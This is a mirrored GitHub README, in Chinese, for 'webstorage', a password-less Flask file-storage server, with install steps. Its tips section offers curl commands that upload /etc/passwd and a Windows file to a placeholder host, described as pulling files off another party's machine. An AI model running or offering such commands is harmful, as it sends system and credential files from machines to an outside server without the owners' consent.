Giter VIP home page Giter VIP logo

webstorage's Introduction

webstorage

基于python3 开发的flask的简单文件存储

用于远程下载、异地备份、私人网盘等

使用方法

1. git clone https://github.com/mycve/webstorage.git
2. cd webstorage
3. pip3 install -r requirements.txt
4. python3 app.py
5. 访问 https://ip:8899 (默认端口8899)

本着轻量级原则,未加密码等功能,私人用吧...

Tips:推荐部署到外企一家python runtime(:- ♥♥♥ because:forever free

Demo(是我已经部署好的,地址我就不放了)

image

小技巧(拖对方机器文件、快捷上传等):

curl https://xxxxx.com/api?action=upload -F "file=@/etc/passwd"
curl https://xxxxx.com/api?action=upload -F "file=@c://1.txt"

执行完了,回到网页刷新网盘 (:- over

webstorage's People

Contributors

mycve avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.